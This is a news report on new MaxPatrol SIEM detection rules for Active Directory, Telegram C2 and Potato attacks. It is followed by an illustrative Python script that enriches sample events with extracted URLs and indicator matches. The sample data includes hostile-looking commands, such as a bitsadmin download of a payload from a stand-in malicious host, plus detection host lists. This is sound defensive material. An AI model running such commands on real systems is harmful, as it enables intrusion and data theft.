Positive Technologies strengthens the SIEM system against modern attacks.
Positive Technologies has announced an update for its MaxPatrol SIEM information security event monitoring and incident management system. About 70 new rules for detecting cyber threats have been integrated into the product, and additional mechanisms have been introduced to facilitate the work of analysts and significantly reduce the time required to investigate incidents.
The biggest changes were made to the rules aimed at detecting attacks on Active Directory. The update covers tactics such as "Initial Access", "Execution", "Privilege Escalation", "Detection Prevention" and "Credential Access". The new rules will allow you to detect both new attack methods, such as using the SOAPHound utility, and long-known techniques.
The company noted that threats for which new rules have been developed require an immediate response. New enrichment mechanisms allow you to supplement correlated and normalized events with useful information about indicators of compromise, which focuses the operator's attention on the most important ones and speeds up the process of validating suspicious events.
The rules for detecting cyber threats added to MaxPatrol SIEM will allow you to identify:
- Attacks on Microsoft Active Directory involving its certificate service (Active Directory Certificate Services, AD CS). Such attacks are among the most frequently successful. MaxPatrol SIEM detects attacks in which access to AD CS components is used to execute code remotely and obtain NTLM hashes of accounts. The product also detects attacks that abuse Active Directory group policies, which let IT administrators centrally manage user roles and computers: attackers can use group policies to substitute programs, launch the processes they need on devices, or add accounts.
- New tools for cybercriminals. For example, the product tracks the activity of the SOAPHound utility, which retrieves data from the Active Directory environment without interacting directly with the LDAP server in order to stay out of the view of security tools.
- Suspicious accesses by files to the Telegram messenger API disguised as legitimate activity. This lets MaxPatrol SIEM detect C2 channels that attackers use to exchange data with compromised devices, download malware, and exfiltrate stolen information to their servers.
- Malicious actions aimed at capturing credentials and gaining initial access to systems. With the new rules, MaxPatrol SIEM detects forced authentication, through which attackers obtain NTLM password hashes. Cybercriminals can then try to authenticate to the system with the hashes themselves or recover the cleartext passwords.
- Exploitation of the family of vulnerabilities known as Potato vulnerabilities. These flaws let cybercriminals escalate privileges from a service account to system rights. Five new rules have been loaded into MaxPatrol SIEM to detect such activity.
Additionally, the product introduces mechanisms that complement normalized information security events with compromise indicators, increasing the accuracy of detecting cyber threats. MaxPatrol SIEM also adds a feature to automatically extract URLs from the command line for all correlation events. These features help specialists collect information faster and reduce the time required to analyze each incident.
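As an added illustration of what the two enrichment steps described above amount to in practice (this is not MaxPatrol SIEM's own code or rule syntax), the Python sketch below takes normalized process-creation events, extracts every URL from the command line, resolves the hostnames, and marks events whose hosts match an indicator list or a watched API such as the Telegram Bot API mentioned in the list above. The event shapes, hostnames, indicator list and the `TOKEN_PLACEHOLDER` value are all constructed for this example.

```python
import re
from urllib.parse import urlparse

# Constructed sample events (not real telemetry): normalized process-creation
# records with the command-line field a correlation rule would inspect.
SAMPLE_EVENTS = [
    {"host": "ws-01", "image": "powershell.exe",
     "cmdline": 'powershell -nop -c "iwr https://api.telegram.org/botTOKEN_PLACEHOLDER/getUpdates"'},
    {"host": "ws-02", "image": "curl.exe",
     "cmdline": "curl -s http://updates.example.internal/agent.msi -o agent.msi"},
    {"host": "ws-03", "image": "notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\alice\\notes.txt"},
    {"host": "ws-04", "image": "bitsadmin.exe",
     "cmdline": "bitsadmin /transfer j http://malware.example/payload.exe C:\\Temp\\p.exe"},
]

# Constructed indicator list: hostnames the defender has marked as IoCs.
IOC_HOSTS = {"malware.example"}

# API endpoints that are legitimate services but commonly abused as C2
# channels; the article names the Telegram messenger API as one of them.
WATCHED_API_HOSTS = {"api.telegram.org"}

# http(s) URLs up to the next whitespace or quote character.
URL_RE = re.compile(r"""\bhttps?://[^\s"'<>]+""", re.IGNORECASE)


def extract_urls(cmdline: str) -> list[str]:
    """Return the http(s) URLs in a command line, in order, without duplicates."""
    found = []
    for m in URL_RE.finditer(cmdline):
        url = m.group(0).rstrip(".,;)")   # drop trailing punctuation glued to the URL
        if url not in found:
            found.append(url)
    return found


def enrich_event(event: dict) -> dict:
    """Copy the event and add extracted URLs, their hosts, and indicator matches."""
    urls = extract_urls(event["cmdline"])
    hosts = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
    enriched = dict(event)
    enriched["urls"] = urls
    enriched["url_hosts"] = hosts
    enriched["ioc_hits"] = sorted(h for h in hosts if h in IOC_HOSTS)
    enriched["watched_api_hits"] = sorted(h for h in hosts if h in WATCHED_API_HOSTS)
    return enriched


def severity(enriched: dict) -> str:
    """Rank an enriched event so the operator sees the important ones first."""
    if enriched["ioc_hits"]:
        return "high"
    if enriched["watched_api_hits"]:
        return "medium"
    if enriched["urls"]:
        return "low"
    return "none"


def triage(events: list[dict]) -> list[dict]:
    """Enrich every event and return them ordered from most to least severe."""
    order = {"high": 0, "medium": 1, "low": 2, "none": 3}
    enriched = []
    for e in events:
        en = enrich_event(e)
        en["severity"] = severity(en)
        enriched.append(en)
    return sorted(enriched, key=lambda e: order[e["severity"]])


if __name__ == "__main__":
    for e in triage(SAMPLE_EVENTS):
        print(e["severity"], e["host"], e["image"], e["url_hosts"], e["ioc_hits"])
```

The ordering step is the point of the enrichment: the indicator match and the watched-host match are attached to the event itself, so a queue sorted on them puts the `malware.example` download and the Telegram API call ahead of the benign internal update, without the analyst having to read each command line first.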
To use the new MaxPatrol SIEM rules and features, you must install the rules from the Expertise package (available for all system versions starting from version 7.2).